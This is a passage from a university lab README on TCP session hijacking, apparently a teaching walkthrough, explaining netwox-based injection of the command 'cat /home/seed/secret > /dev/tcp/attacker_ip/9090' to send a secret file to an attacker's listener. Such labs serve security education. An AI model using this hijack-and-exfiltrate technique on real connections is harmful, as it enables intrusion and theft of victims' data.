jidongbsu/cs333/labs/tcphijack/README.md

 Thus in this example, the netwox 40 command we are going to type is:
 ![alt text](lab-tcp-hijack-command.png "Lab tcp hijack - the netwox command")

+**Explanation 2**: why the telnet command we want to inject is "cat /home/seed/secret > /dev/tcp/attacker_ip/9090".
+Because "cat /home/seed/secret" shows the content of the secret file, but this command will only display the content in the victim client's terminal window, not in the attacker's terminal window.
+This "cat /home/seed/secret > /dev/tcp/attacker_ip/9090" will redirect the output of the cat command into a tcp port 9090 at the attacker's ip address.
+Thus we come to our next step,

 7. before pressing enter, the attacker needs to open another terminal window so that the attacker can listen on a port - we will choose port 9090.